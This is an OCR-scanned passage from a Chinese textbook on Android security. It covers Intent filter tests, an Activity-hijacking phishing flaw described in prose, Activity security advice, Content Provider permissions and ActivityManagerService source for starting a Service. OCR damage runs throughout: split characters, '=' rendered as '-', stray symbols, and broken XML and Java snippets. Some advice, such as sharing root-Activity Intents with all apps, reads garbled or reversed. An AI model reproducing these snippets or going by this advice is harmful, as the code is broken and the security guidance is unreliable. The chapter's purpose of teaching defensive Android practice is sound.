都 被 测试 。 为 了 递交 到 拥有 这 个 过 滤器 的 组 件 ， 过 滤器 必须 通过 动作 、 数 据 以 及 类 别 这 3 项 测试 。 即 使 只 
有 一 个 不 通过 ，Android 系统 也 不 会 把 它 递交 给 这 个 组 件 。 但 是 因为 一 个 组 件 可 以 包含 多 个 Intent 过 滤器 ， 
当 一 个 不 能 通过 其 中 一 个 组 件 过 滤器 的 Intent， 可 能 会 在 另外 的 过 滤器 上 获得 通过 。 

在 接 下 来 的 内 容 中 ， 开 始 演示 过 滤器 在 动作 、 类 别 和 数据 字段 这 3 个 方面 的 测试 。 

(1) 动作 测试 (Actiontest) 

在 下 面 的 Intent 过 滤器 元 素 代 码 中 列举 了 动作 元 素 。 

<intent-filter... > 
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«action android:name-"com.example.project.SHOW CURRENT" /> 
«action android:name-"com.example.project.SHOW RECENT" /» 
«action android:name-"com.example.project.SHOW PENDING" /> 


</intent-filter> 

在 上 述 代码 中 ， 一 个 Intent 对 象 只 对 单个 动作 命名 ， 而 一 个 过 滤器 可 能 会 列举 多 个 。 列 表 不 能 为 空 ; 
个 过 滤器 必须 包含 至 少 一 个 动作 元 素 ， 否 则 将 阻塞 所 有 的 意图 。 为 了 通过 上 述 测试 ,在 Intent 对 象 中 指定 的 
动作 必须 匹配 过 滤器 中 所 列举 的 动作 之 一 。 如 果 Intent 对 象 或 过 滤器 不 指定 一 个 动作 ， 则 结果 是 这 个 过 滤器 
没有 列 出 任何 动作 ， 因 为 Intent 就 不 会 有 什么 可 匹配 的 ， 所 以 所 有 的 意图 测试 都 会 失败 ， 也 就 没有 Intent 能 
够 通过 这 个 过 滤器 。 另 外 ， 一 个 未 指定 动作 的 Intent 对 象 会 自动 通过 这 个 测试 ， 前 提 是 只 要 过 滤器 包含 至 少 

-个 动作 。 

(2) 类 别 测试 CCategorytest? 

例如 ， 在 下 面 的 测试 代码 中 ， 一 个 Intent 过 滤器 <intent-filter> 将 类 别 作为 了 子 元 素 。 

<intent-filter... > 

<category android:name="android.intent.category.DEFAULT" /> 

<category android:name="android.intent.category.BROWSABLE" /> 


</intent-filter> 

在 上 述 代码 中 使 用 了 完整 的 字符 串 。 对 于 一 个 通过 类 别 测试 的 Intent， 每 个 Intent 对 象 中 的 类 别 必须 匹 
配 一 个 过 滤器 中 的 类 别 。 这 个 过 滤器 可 以 列举 另外 的 类 别 , 但 是 不 能 遗漏 任何 在 这 个 Intent 中 的 类 别 。 所 以 ， 
原则 上 一 个 没有 类 别 的 Intent 对 象 应 该 总 是 能 够 通过 测试 ， 无 论 过 滤器 中 有 什么 。 

G) 数据 测试 (Data test) 

和 动作 测试 、 类 别 测试 一 样 ， 一 个 Intent 过 滤器 的 数据 规格 被 包含 在 一 个 子 元 素 中 ， 而 且 这 个 子 元 素 不 
但 可 以 多 次 出 现 ， 也 可 以 一 次 都 不 出 现 。 例 如 下 面 的 演示 代码 。 

<intent-filter... > 

«data android:type="video/mpeg" android:scheme="http" ... /> 

«data android:type="audio/mpeg" android:scheme="http" ... /> 


</intent-filter> 

在 上 述 代码 中 ,每 个 数据 <data> 元 素 可 以 指定 一 个 URI 和 一 个 数据 类 型 (MIME 媒体 类 型 ) 。 当 一 个 多 
次 对 象 中 的 URI 被 用 来 和 一 个 过 滤器 中 的 URI 规格 比较 时 ， 实 际 上 比较 的 是 URI 的 各 个 部 分 。 假 如 过 滤器 
仅仅 是 指定 了 一 个 模式 ， 则 所 有 此 模式 的 URIs 和 这 个 过 滤器 相 匹配 。 

数据 <data> 元 素 的 类 型 属性 指定 了 数据 的 MIME 类 型 ， 这 一 点 在 过 滤器 中 比 在 URI 中 更 为 常见 。 多 次 
对 象 和 过 滤器 都 可 以 使 用 “* ”通配符 指定 子 类 型 字段 ， 例 如 “texy* ”和 “audio*”。 

在 Android 系统 中 , 如 果 Intent 使 用 隐 式 方式 (setaction ) 来 标识 Intent 消息 , 则 接收 方 可 以 通过 此 action 
来 接收 信息 。 如 果 Intent 没有 明确 指定 哪些 接收 方 有 权限 接收 ， 那 么 恶意 程序 在 指定 Action 标识 后 可 以 获 
取 Intent 内 容 ， 从 而 会 导致 数据 泄露 的 情况 发 生 。 
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м 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 9 章 \Activity 组 件 的 安全 机 制 .avi 
在 Android 系统 中 ,不同 的 程序 之 间 可 以 实现 无 颖 切换， 它们 之 间 的 切换 工作 是 通过 Activity 组 件 的 切 
换 实现 的 。Activity 相当 于 一 个 与 用 户 交互 的 界面 ， 在 Android 系统 中 通过 AMS CActivityManagerService, 
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Activity 管理 服务 ) 来 管理 Activity 的 调度 工作 。Android 应 用 程序 要 想 启 动 或 停止 一 个 进程 ， 都 需要 事先 报 
告 给 AMS 系统 ， 当 AMS 收 到 要 启动 或 停止 Activity 的 消息 时 会 先 更 新 内 部 记录 ， 然 后 再 通知 相应 的 进程 
运行 或 停止 指定 的 Activity。 当 启动 新 的 Activity 时 ， 就 会 停止 前 一 个 Activity， 这 些 Activity 都 会 被 保留 在 
系统 的 Activity 历史 栈 中 。 每 当 启动 一 个 新 的 Activity 时 ， 会 将 这 个 Activity 保存 到 历史 栈 项 ， 并 在 手机 上 
显示 。 当 用 户 点 按 Back 键 时 会 弹出 顶部 Activity， 并 恢复 前 一 个 Activity， 栈 顶 指向 当前 的 Activity。 


9.3.1 Activity 劫持 漏洞 


当 在 Android 系统 中 启动 一 个 Activity 时 ,会 给 这 个 Activity 添加 FLAG. ACTIVITY NEW TASK 标志 
位 ， 这 样 能 使 其 置 于 栈 顶 并 且 可 以 呈现 给 用 户 。 但 是 如 果 这 个 Activity 是 用 于 盗号 的 伪装 Activity， 就 会 发 
生动 持 漏洞 的 情况 。 

在 Android 系统 中 ， 应 用 程序 可 以 在 不 需要 声明 其 他 权限 的 情况 下 枚 举 当前 运行 的 进程 。 基 于 此 ， 就 可 
以 编写 一 个 启动 后 台 服 务 程序 的 进程 ， 这 个 服务 能 够 不 断 扫描 当前 运行 的 进程 。 当 发 现 启动 目标 进程 时 ， 
就 会 启动 一 个 伪装 的 Activity。 如 果 这 个 Activity 是 登录 界面 ， 那 么 就 可 以 从 中 获取 用 户 的 账号 密码 。 

解决 上 述 漏洞 的 方法 非常 简单 ， 长 按 Android 设备 的 HOME 键 后 可 以 查看 近期 任务 。 举 个 简单 例子 ， 
假如 在 登录 QQ 时 长 按 HOME 键 后 发 现 近 期 任务 出 现 了 QQ， 则 说 明 当 前 的 登录 界面 可 能 是 伪装 程序 。 此 
时 可 以 切换 到 另 一 个 程序 再 查看 近期 任务 ， 这 样 就 可 以 知道 这 个 登录 界面 的 具体 来 源 程序 了 。 但 是 一 般 不 
会 在 每 次 启动 程序 时 都 去 判断 当前 具体 运行 程序 的 来 源 ， 可 以 编程 设置 获取 当前 运行 的 是 哪 一 个 程序 ， 并 
且 将 其 显示 在 一 个 浮动 窗口 中 ， 这 样 可 以 帮助 用 户 判断 当前 运行 的 是 哪 一 个 程序 ， 防 范 钓鱼 软件 的 欺骗 。 
这 样 就 不 需要 通过 枚 举 来 获取 当前 运行 的 程序 了 ， 只 需 在 manifest 文件 中 增加 如 下 权限 。 

<uses-permission android:name-"android.permission. GET TASKS" /> 

这 样 在 启动 程序 时 可 以 启动 一 个 Service， 然 后 在 Service 中 启动 一 个 浮动 窗口 ， 可 以 周期 性 检测 当前 运 
行 的 是 哪 一 个 程序 ， 然 后 再 在 浮动 窗口 中 显示 。 


9.3.2 ”针对 Activity 的 安全 建议 


(1) 一 定 要 将 在 本 应 用 程序 内 部 使 用 、 不 准备 对 外 公开 的 Activity 设置 为 非 公 开 ， 这 样 做 的 目的 是 防 
止 被 黑客 非法 调用 。 
(2) 不 要 指定 taskAffinity 属性 。 因 为 Android 中 的 Activity 全 都 归属 于 task 管理 ， 所 以 task 是 一 种 
stack 的 数据 结构 ， 先 入 后 出 。 如 果 不 指 明 taskAffinity 属性 归属 于 什么 task， 则 在 同一 个 应 用 程序 内 部 的 所 
有 Activity 都 会 运行 在 一 个 task 中 ，task 的 名 字 就 是 应 用 程序 的 packageName。 因 为 在 同一 个 Android 设备 
中 不 会 有 两 个 相同 packageName 的 应 用 程序 存在 ， 所 以 可 以 保证 Activity 不 被 攻击 。 
(3) 不 要 指定 LaunchMode 的 模式 。 
在 Android 系统 中 ，Activity 的 LaunchMode 有 如 下 4 种 模式 。 
О Standard: 这 种 方式 打开 的 Activity 不 会 被 当 作 rootActivity， 会 生成 一 个 新 的 Activity 的 instance， 会 
和 打开 者 在 同一 个 task 内 。 
口 singleTop: 和 standard 模 式 基本 一 样 ,唯一 的 区 别 在 于 如 果 当 前 task 的 第 一 个 Activity 就 是 该 Activity， 
则 不 会 生成 新 的 instance。 
0 singleTask: 系统 会 在 新 task 根 部 创建 一 个 新 task 〈 如 果 没 有 启动 应 用 ) 和 一 个 Activity 新 实例 ， 如 果 
Activity 实 例 已 经 存在 于 单独 的 task 中 ， 则 系统 会 调用 已 经 存在 Activity 的 onNewIntent() 方 法 ， 而 不 
是 存在 于 新 实例 ， 仅 有 一 个 Activity 实 例 同 时 存在 。 
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口 singleInstance: 和 singleTask 模 式 相似 ， 除 了 系统 不 会 让 其 他 的 activities 运 行 在 所 有 持 有 的 task 实 例 
中 ， 这 个 Activity 是 独立 的 ， 并 且 task 中 的 成 员 只 有 它 ， 任 何其 他 activities 运 行 这 个 Activity 都 将 打开 
-个 独立 的 task。 

在 Android 系统 中 ， 因 为 所 有 发 送 给 root Activity (He Activiy) 的 Intent 都 会 在 Android 中 留 下 记录 信 
息 , 所 以 严禁 使 用 singleTask 或 singleInstance 来 启动 画面 .但 是 即使 用 standard 打开 了 画面 也 可 能 会 出 问题 ， 
例如 ， 调 用 者 的 Activity 是 用 singleInstance 模式 打开 的 ， 即 使 用 standard 模式 打开 被 调用 Activity， 因 为 调 
用 者 的 Activitytask 是 不 能 有 其 他 task 的 ， 所 以 Android 会 被 迫 生成 一 个 新 的 task， 并 且 把 被 调用 者 塞 进去 ， 

最 终 会 被 调用 者 变 成 root Activity。 

(4) 不 要 将 发 给 Activity 的 Intent 设 定 为 FLAG ACTIVITY NEW_TASK， 即 使 将 上 面 Activity 的 
lauchMode 模式 设置 完善 了 ， 在 打开 Intent 时 还 是 可 以 指定 打开 模式 。 假 如 在 Intent 中 设置 使 用 
FLAG ACTIVITY NEW TASK 模式 ， 如 果 发 现 该 Activity 不 存在 就 会 强制 新 建 一 个 task。 如 果 同 时 设置 了 
FLAG ACTIVITY _ MULTIPLE_ TASK 和 FLAG ACTIVITY NEW_TASK， 则 无 论 如 何 都 会 生成 新 的 task, 
该 Activity 就 会 变 成 root Activity， 并 且 Intent 会 被 记录 足迹 。 

(5) Activity 中 数据 的 传递 是 通过 Intent 实现 的 ， 很 容易 被 攻击 ， 所 以 建议 即使 是 在 同一 个 应 用 程序 内 
部 传递 数据 也 要 加 密 信息 。 

(6) 明确 Activity 发 送 ntent， 这 样 能 够 避免 被 恶意 软件 截取 。 

(7) 在 跨 应 用 程序 接收 Intent 时 ， 必 须 明确 对 方 的 身份 。 在 接收 到 别 的 应 用 程序 发 来 的 Intent 时 ， 也 
要 确定 对 方 的 身份 。 

(8) 保证 所 有 根 Activity 中 的 Intent 都 能 被 所 有 应 用 程序 共享 ， 这 样 就 可 以 及 时 获得 当前 手机 中 所 有 
task 上 所 有 根 Activity 接收 到 的 Intent。 


9.4 Content Provider 组 件 的 权限 机 制 


GE 知识 点 讲解 :光盘 :视频 \ 知 识 点 \ 第 9 章 \Content Provider 组 件 的 权限 机 制 .avi 

在 Android 系统 中 , Content Provider 存储 机 制 的 权限 管理 比较 复杂 , 在 一 个 Provider 中 可 能 有 私有 数据 ， 
也 可 能 有 公有 数据 。 也 就 是 说 ， 有 些 数据 可 以 公开 ， 而 有 些 不 可 以 公开 。 同 时 ， 有 些 数据 可 以 让 其 他 用 户 
修改 ， 有 些 则 不 可 以 。 由 此 可 见 ，Provider 需要 设置 如 下 权限 。 

Q 读 权 限 : android:readPermission 。 

О 写 权限 : android:writePermission。 


在 本 节 的 内 容 中 ， 将 详细 讲解 Content Provider 组 件 的 权限 机 制 的 基本 知识 。 
9.4.1 Content Provider 在 应 用 程序 中 的 架构 


如 果 使 用 命令 adb shell 连接 Android 模拟 器 ， 在 /data/data 目录 下 会 看 到 很 多 以 应 用 程序 包 (package) 
命名 的 文件 夹 ， 在 这 些 文件 夹 中 存放 的 是 各 个 应 用 程序 的 数据 文件 。 例 如， 进入 到 Android 系统 日 历 应 用 程 
序数 据 目 录 com.android.providers.calendar 下 的 databases 文件 中 , 会 看 到 一 个 用 来 保存 日 历数 据 的 数据 库 文 


件 calendar.db， 其 权限 设置 代码 如 下 所 示 。 
root@android:/data/data/com.android.providers.calendar/databases # Is -I 
-rw-rw-—- app_17 app_17 33792 2013-09-07 15:50 calendar.db 


在 上 述 代 码 “-rw-rw----” 中 ， 各 个 字符 的 具体 说 明 如 下 所 示 。 
口 最 前 面 的 符号 “-”: 表示 这 是 一 个 普通 文件 。 
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接 下 来 的 3 个 字符 “rw-”: 表示 此 文件 的 所 有 者 对 这 个 文件 可 读 可 写 但 不 可 执行 。 
接 下 来 的 3 个 字符 “rw-”: 表示 这 个 文件 的 所 有 者 所 在 的 用 户 组 的 用 户 对 这 个 文件 可 读 可 写 不 可 执行 。 
最 后 的 3 个 字符 “---”: 表示 其 他 用 户 对 这 个 文件 不 可 读 写 也 不 可 执行 。 因 为 这 是 一 个 数据 文件 ， 
所 以 所 有 用 户 都 不 可 以 执行 它 是 正确 的 。 
О 接 下 来 的 两 个 app_17 字 符 串 : 表示 这 个 文件 的 所 有 者 和 这 个 所 有 者 所 在 的 用 户 组 的 名 称 均 为 
app_17， 这 是 在 安装 应 用 程序 时 由 系统 分 配 的 。 在 不 同系 统 上 的 该 字符 串 可 能 会 不 同 , 但 是 所 表示 
的 意义 是 一 样 的 。 表 示 只 有 用 户 ID 为 app_17， 或 者 用 户 组 ID 为 app_17 的 进程 才 可 以 对 文件 
calendar.db 进 行 读 写 操作 。 通 过 执行 终端 上 的 命令 可 以 查看 哪个 进程 的 用 户 ID 为 app_17。 

Android 系统 对 应 用 程序 的 数据 文件 有 着 严格 的 保护 措施 。 当 开发 自己 的 应 用 程序 时 ， 有 了 时 会 希望 读 取 
通讯 录 中 某 个 联系 人 的 手机 号 码 或 者 电子 邮件 ， 以 便 拨打 该 联系 人 的 电话 或 者 发 送 电 子 邮 件 ， 这 时 就 需要 
读 取 通 讯 录 里 的 联系 人 数据 文件 了 。 在 Android 应 用 程序 中 ， 有 很 多 第 三 方 公司 都 推出 了 专业 性 的 API, iX 
些 API 的 目标 是 要 将 开放 用 户 数据 给 第 三 方 来 使 用 ， 例 如 ，Android 系统 中 的 通讯 录 ， 它 需要 把 自己 联系 人 
数据 开放 出 来 给 其 他 应 用 程序 使 用 。 但 是 ， 这 些 数据 都 是 各 个 平台 自己 的 核心 数据 和 核心 竞争 力 ， 需 要 有 
保护 地 进行 开放 。 为 此 Android 系统 特意 推出 了 Content Provider, 它 秉承 了 有 保护 地 开放 自己 的 数据 给 其 他 
应 用 程序 使 用 的 理念 。 

Content Provider 机 制 在 Android 应 用 项 目 开 发 中 占 重 要 地 位 , 这 是 现实 需求 所 决定 的 。 例 如 , 在 设计 大 
型 的 复杂 的 软件 时 ， 需 要 分 模块 、 分 层次 来 实现 各 个 子 功能 组 件 ， 使 得 各 个 模块 功能 以 松 看 合 的 方式 组 织 
在 一 起 完成 整个 应 用 程序 功能 。 这 样 做 的 好 处 如 下 。 

口 便于 维护 和 扩展 应 用 程序 的 代码 和 功能 。 

O 更 加 适应 复杂 的 业务 环境 。 

如 果 从 垂直 的 方向 来 看 一 个 大 型 的 应 用 程序 软件 架构 ， 通 常会 分 为 如 下 层次 结构 。 

а 数据 层 : 用 来 保存 数据 ， 这 些 数据 可 以 用 文件 的 方式 来 组 织 ， 也 可 以 用 数据 库 的 方式 来 组 织 ， 甚 至 

可 以 保存 在 网 络 中 。 

口 数据 访问 接口 层 : 负责 向 上 面 的 业务 层 提供 数据 ， 向 下 管理 好 数据 层 的 数据 。 

а 业务 层 : 通过 数据 访问 层 来 获取 一 些 业 务 相关 的 数据 以 实现 自己 的 业务 逻辑 。 

根据 上 述 层次 结构 的 描述 ， 可 以 得 出 一 个 通用 Android 应 用 程序 的 架构 图 ， 如 图 9-1 所 示 。 
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图 9-1 通用 Android 应 用 程序 的 架构 图 


在 图 9-1 所 示 的 架构 中 , 数据 层 视野 数据 库 、 文 件 或 网 络 用 来 保存 数据 , 数据 访问 层 使 用 Content Provider 
来 实现 ， 而 业务 层 就 通过 一 些 APP 来 实现 。 为 了 降低 各 个 功能 模块 间 耦 合 性 ， 可 以 把 业务 层 的 各 个 APP 和 
数据 访问 层 中 的 Content Provider 放 在 不 同 的 应 用 程序 进程 中 来 实现 。 而 数据 库 中 的 数据 统一 由 Content 
Provider 来 管理 ，Content Provider 拥有 对 这 些 文件 直接 进行 读 写 的 权限 ， 并 且 可 以 根据 需要 有 保护 地 把 这 些 
数据 开放 出 来 供 上 层 APP 使 用 。 
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9.4.2 ”提供 不 同 的 权限 机 制 


在 Android 系统 中 ， 使 用 <provider> 标 签 可 以 限制 能 够 访问 ContentProvider 中 数据 的 组 件 或 应 用 程 
序 〈 内 容 提供 器 有 一 个 重要 的 附加 安全 设施 可 用 于 调用 被 描述 后 的 URI 权限 ) 。 不 同 于 其 他 组 件 ， 它 
有 两 个 不 相 联系 的 权限 属性 设置 : android:read Permission 用 于 限制 能 够 读 取 内 容 提供 器 的 组 件 或 应 用 程 
序 ，android:writePermission 用 于 限制 能 够 写 入 内 容 提供 器 的 组 件 或 应 用 程序 。 注 意 ， 如 果 一 个 内 容 提 
供 器 的 读 / 写 权 限 受 保护 ， 表 明 只 能 从 内 容 提供 器 中 读 取 ， 而 没有 写 权 限 。 当 首次 获得 内 容 提 供 器 (如 
果 没 有 任何 权限 ， 将 会 抛 出 一 个 SecurityException 异常 ) ， 需 要 在 内 容 提供 器 上 执行 操作 ， 则 需要 检查 
权限 。 使 用 ContentResolver.query0 请 求 获取 读 权限 , 使 用 ContentResolver.insert(), ContentResolver.update(), 
ContentResolver.delete() 或 Cursor.commit Updates() 请 求 获 取 写 权限 。 在 这 些 情况 下 ， 如 果 调用 者 抛 出 一 
个 Security Exception 异常 ， 则 表明 没有 获得 请 求 的 权限 。 

在 Android 系统 中 ， 因 为 一 个 Provider 可 能 会 被 多 个 程序 共同 调用 ， 这 个 Provider 数据 需要 与 之 实现 同 
步 处 理 功能 ， 所 以 需要 设置 android:multiprocess="true" 功 能 。 因 为 数据 的 限制 需要 体现 在 对 URI 的 控制 上 ， 
所 以 Provider 是 通过 URI 来 识别 需要 操作 的 具体 数据 是 什么 。 通 过 设置 path-permission 权限 ， 可 以 控制 访 
问 在 这 个 路 径 下 的 数据 的 权限 ， 例 如 : 

<path-permission android:pathPrefix="/users" android:permission="lichie.provider.permission"/> 

上 述 代 码 的 含义 是 ， 要 想 访问 /users 路 径 下 的 数据 ， 必 须要 具有 lichie.provider.permission 权限 。 如 果 没 

有 设置 Provider 权限 ， 而 只 是 设置 了 path-permission 的 权限 ， 那 么 在 Android 中 设置 path-permission 的 权限 
不 会 生效 。 

«provider android:name=".PackageProvider" android:authorities="com.ygomi.packageprovider" 
android:multiprocess="true" 
android:readPermission="com.ygomi.packageprovider.permission.read"> 

<path-permission android:pathPattern="/apks/.*" 
android:permission="com.ygomi.packageprovider.permission.application.read"/> 

</provider> 

上 述 代码 中 的 path-permission 权限 是 有 效 的 ， 而 下 面 代码 中 的 path-permission 权限 是 无 效 的 。 

«provider android:name=".PackageProvider" android:authorities="com.ygomi.packageprovider" 
android:multiprocess="true" > 

<path-permission android:pathPattern="/apks/.*" 
android:permission="com.ygomi.packageprovider.permission.application.read"/> 

</provider> 

在 上 述 代 码 中 ，android:grantUriPermissions 用 于 管理 需要 处 理 的 数据 权限 的 范围 。 如 果 设 置 了 
android:readPermission, android:writePermission 和 android:permission 中 的 任意 一 个 android:grantUriPermissions， 则 
会 默认 android:grantUriPermissions 的 值 是 true。 如 果 设置 了 grant-uri-permission， 那 么 android:grantUri- 
Permissions 的 默认 值 就 是 false。 如 果 都 设置 了 ， 那 么 android:grantUriPermissions 的 默认 值 也 是 false. 

当 在 Android 系统 中 需要 访问 Provider 时 ， 通 过 granturi-permission 可 以 绕 过 权限 控制 。 举 个 例子 ， 假 
如 在 应 用 程序 A (Application) 中 有 一 个 提供 数据 给 其 他 程序 访问 的 Provider， 但 是 他 需要 设置 一 个 权限 控 
制 ， 所 以 在 应 用 程序 A 的 配置 文件 中 会 有 如 下 代码 。 

<provider android:name=".MyProvider" android:authorities="mytest.testProvider" 
android:readPermission="lichie.provider.permission" 
android:multiprocess="true"> 
<grant-uri-permission android:pathPrefix="/user/" /> 

</provider> 


上 述 代码 的 功能 是 ， 除 了 应 用 程序 A 外 的 其 他 所 有 程序 ， 都 必须 具有 lichie.provider.permission 权限 时 
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才能 访问 Provider 的 数据 ， 但 是 也 允许 在 没有 权限 时 通过 /user/ 来 访问 。 没 有 权限 时 可 以 用 /user/ 来 访问 ,不 
是 前 后 矛盾 吗 ? 其实 grant-uri-permission 的 作用 是 调用 Provider 的 程序 (这 里 叫 应 用 程序 B) 可 以 没有 权限 ， 
但 是 调用 应 用 程序 В 的 程序 (可 以 称 之 为 程序 C) 必须 要 有 权限 。 所 以 在 应 用 程序 C 的 配置 文件 中 ， 需 要 
有 如 下 代码 。 
<uses-permission android:name="lichie.provider.permission" /> 
在 应 用 程序 C 中 ， 调 用 程序 B 的 代码 如 下 所 示 。 
Intent intent = new Intent(); 
intent.addCategory("lichie.category.one"); 
intent.setAction("lichie.action.one"); 
intent.setData(Uri.parse("content://mytest.testProvider/ddd/")); 
intent.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION); 
在 应 用 程序 B 的 配置 文件 中 ， 包 含 如 下 代码 。 
<intent-filter> 
<action android:name="lichie.action.one" /> 
<category android:name="lichie.category.one" /> 
«data android:scheme="content" android:pathPrefix-"mytest.testProvider"/» 
«category android:name-"android.intent.category.DEFAULT" /> 
</intent-filter> 
应 用 程序 B 中 ， 调 用 Provider 的 代码 如 下 所 示 。 
<provider android:name=".PackageProvider" android:authorities="com.ygomi.packageprovider" 
android:multiprocess="true" 
android:readPermission="com.ygomi.packageprovider.permission.read"> 
<path-permission android:pathPattern="/apks/.*" 
android:permission="com.ygomi.packageprovider.permission.application.read"/> 
</provider> 
此 时 虽然 应 用 程序 B 没有 访问 权限 ， 但 是 因为 调用 它 的 程序 C 具有 了 访问 权限 ， 所 以 程序 B 也 就 可 以 
访问 Provider 了 。 


9.5 Service 组 件 的 安全 机 制 


Фи 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 9 章 \Service 组 件 的 安全 机 制 .avi 

在 编写 Android 应 用 程序 时 ， 一 般 将 一 些 计算 型 的 逻辑 放 在 一 个 独立 的 进程 中 处 理 ， 这 样 主 进程 仍然 可 
以 流畅 地 响应 界面 事件 ， 提 高 用 户 体验 。Android 系统 提供 了 一 个 Service 类 ， 可 以 实现 一 个 以 Service 为 基 
类 的 服务 子 类 ， 在 其 中 实现 自己 的 计算 型 逻辑 ， 然 后 在 主 进程 中 通过 startService() 函 数 来 启动 这 个 服务 。 在 
主 进程 调用 startService() 函 数 时 ， 会 通过 Binder 进程 间 通 信和 机制 通知 ActivityManagerService 创建 新 进程 ， 
并 且 启 动 指定 的 服务 。 在 本 节 的 内 容 中 ， 将 详细 讲解 Service 组 件 的 安全 机 制 。 


9.5.1 启动 Service 


Android 系统 通过 函数 startService() 启 动 Service， 此 函数 在 文件 frameworks/base/services/java/com/ 
android/server/am/ActivityManagerService.java 中 定义 。 主 要 实现 代码 如 下 所 示 。 
public final class ActivityManagerService extends ActivityManagerNative 
implements Watchdog.Monitor, BatteryStatslmpl.BatteryCallback { 
e. 
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public ComponentName startService(lApplication Thread caller, Intent service, 
String resolvedType) ( 
// Refuse possible leaked file descriptors 
if (service != null && service.hasFileDescriptors() == true) ( 
throw new lllegalArgumentException("File descriptors passed in Intent"); 
} 


synchronized(this) ( 

final int callingPid = Binder.getCallingPid(); 

final int callingUid = Binder.getCallingUid(); 

final long origld 7 Binder.clearCallingldentity(); 

ComponentName res = startServiceLocked(caller, service, 
resolvedType, callingPid, callingUid); 

Binder.restoreCallingldentity(origld); 

return res; 


} 

在 上 述 代 码 中 , BA caller, service 和 resolvedType 分 别 对 应 ActivityManagerProxy.startService 传 进 的 3 
个 参数 。 

接 下 来 启动 函数 ActivityManagerService.startServiceLocked0， 此 函数 在 文件 frameworks/base/services/ 
java/com/android/server/am/ActivityManagerService.java 中 定义 ,首先 通过 retrieveServiceLocked 来 解析 service 
这 个 Intent， 就 是 解析 前 面 在 AndroidManifest.xml 中 定义 的 Service 标签 的 intent-filter 相关 内 容 ， 然 后 将 解 
析 结 果 放 在 res.record 中 ， 继 续 调 用 bringUpServiceLocked 做 进一步 处 理 。 函 数 ActivityManager- 
Service.startServiceLocked0 的 具体 实现 代码 如 下 所 示 。 

public final class ActivityManagerService extends ActivityManagerNative 

implements Watchdog.Monitor, BatteryStatsImpl.BatteryCallback ( 


Sy 


ComponentName startServiceLocked(lApplicationThread caller, 
Intent service, String resolvedType, 
int callingPid, int callingUid) ( 
synchronized(this) ( 


ServiceLookupResult res = 
retrieveServiceLocked(service, resolvedType, 
callingPid, callingUid); 


ServiceRecord r = res.record; 
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if (IbringUpServiceLocked(r, service.getFlags(), false)) ( 
return new ComponentName("!", "Service process is bad"); 
} 


return г.пате; 


} 

再 看 函数 ActivityManagerService.bringUpServiceLocked()， 此 函数 在 frameworks/base/services/java/com/ 
android/server/am/ActivityManagerService.java 文件 中 定义 ， 其 中 ,appName 是 在 AndroidManifest.xml 文件 定 
义 service 标 签 时 指定 的 android:process ЕН, Ell Server. Æt ActivityManagerService.bringUpServiceLocked() 
的 主要 实现 代码 如 下 所 示 。 

public final class ActivityManagerService extends ActivityManagerNative 

implements Watchdog.Monitor, BatteryStatsImpl.BatteryCallback ( 


private final boolean bringUpServiceLocked(ServiceRecord r, 
int intentFlags, boolean whileRestarting) ( 


final String appName = r.processName; 


// Not running -- get it started, and enqueue this service record 

11 to be executed when the app comes up 

if (startProcessLocked(appName, r.applnfo, true, intentFlags, 
"service", r.name, false) == null) ( 


return false; 


) 

if (ImPendingServices.contains(r)) { 
mPendingServices.add(r); 

} 


return true; 
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接着 调用 startProcessLocked() 函 数 来 创建 一 个 新 的 进程 ， 以 便 加 载 自 定义 的 Service 类 。 最 后 将 这 个 
ServiceRecord 保存 在 成 员 变 量 mPendingServices 列表 中 。 函 数 ActivityManagerService.startProcessLocked() 
在 文件 frameworks/base/services/java/com/android/server/am/ActivityManagerService.java 中 定义 ， 主 要 实现 代 
人 码 如 下 所 示 。 

public final class ActivityManagerService extends ActivityManagerNative 

implements Watchdog.Monitor, BatteryStatsImpl.BatteryCallback { 


private final void startProcessLocked(ProcessRecord app, 
String hostingType, String hostingNameStr) { 


try { 


int pid = Process.start("android.app.ActivityThread", 
mSimpleProcessManagement ? app.processName : null, uid, uid, 
gids, debugFlags, null); 


if (pid == 0 || pid == MY. PID)( 


} else if (pid > 0) ( 
app.pid = pid; 
app.removed - false; 
synchronized (mPidsSelfLocked) ( 
this.mPidsSelfLocked.put(pid, app); 


ү else { 


} catch (RuntimeException e) { 


ез 


在 上 述 代 码 中 ， 调 用 函数 Process.start0 创 建 了 一 个 新 的 进程 ， 指 定 新 的 进程 执行 android.app. Activity Thread 
类 。 最 后 将 表示 这 个 新 进程 的 ProcessRecord 保存 在 mPidSelfLocked 列表 中 。 

接 下 来 执行 函数 Process.start(), 此 函数 比较 简单 ,在 文件 frameworks/base/core/java/android/os/Process.java 
中 定义 ， 功 能 是 新 建 一 个 进程 ， 然 后 导入 android.app.ActivityThread 类 ， 然 后 执行 它 的 main() 函 数 。 

再 看 函数 ActivityThread.main(), 此 函数 在 frameworks/base/core/java/android/app/ActivityThread.java 文件 
中 定义 ， 主 要 实现 代码 如 下 所 示 。 

public final class ActivityThread { 


public static final void main(String[ ] args) ( 
Looper.prepareMainLooper(); 


ActivityThread thread = new ActivityThread(); 
thread.attach(false); 


Looper.loop(); 


thread.detach(); 


} 
} 
接 下 来 执行 函数 ActivityThread.attach()， 此 函数 在 文件 frameworks/base/core/java/android/app/Activity- 


Threadjava 中 定义 ， 主 要 实现 代码 如 下 所 示 。 
public final class ActivityThread { 


private final void attach(boolean system) { 
if (Isystem) ( 


lActivityManager mgr = Activity ManagerNative.getDefault(); 
try { 
mgr.attachApplication(mAppThread); 


e. 
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) catch (RemoteException ex) ( 
} 


) else ( 


) 
在 上 述 代码 中 ， 传 进来 的 参数 system 为 false。 成 员 变量 mAppThread 是 一 个 ApplicationThread 实例 ， 


在 前 面 已 经 描述 过 这 个 实例 的 作用 ， 它 是 用 来 辅助 ActivityThread 执行 一 些 操作 的 。 调 用 函数 
ActivityManagerNative.getDefault()f5-$| ActivityManagerService 的 远程 接口 ， 即 ActivityManagerProxy， 接 着 


调 


函数 attachApplication(). 函数 ActivityManagerProxy.attachApplication() 定 义 在 frameworks/base/core/java/ 


android/app/ActivityManagerNative.java 文件 中 ， 主 要 实现 代码 如 下 所 示 。 


class ActivityManagerProxy implements IActivityManager 
{ 


public void attachApplication(lApplicationThread app) throws RemoteException 

{ 
Parcel data = Parcel.obtain(); 
Parcel reply = Parcel.obtain(); 
data.writelnterfaceToken(lActivityManager.descriptor); 
data.writeStrongBinder(app.asBinder()); 
mRemote.transact(ATTACH_ APPLICATION TRANSACTION, data, reply, 0); 
reply.readException(); 
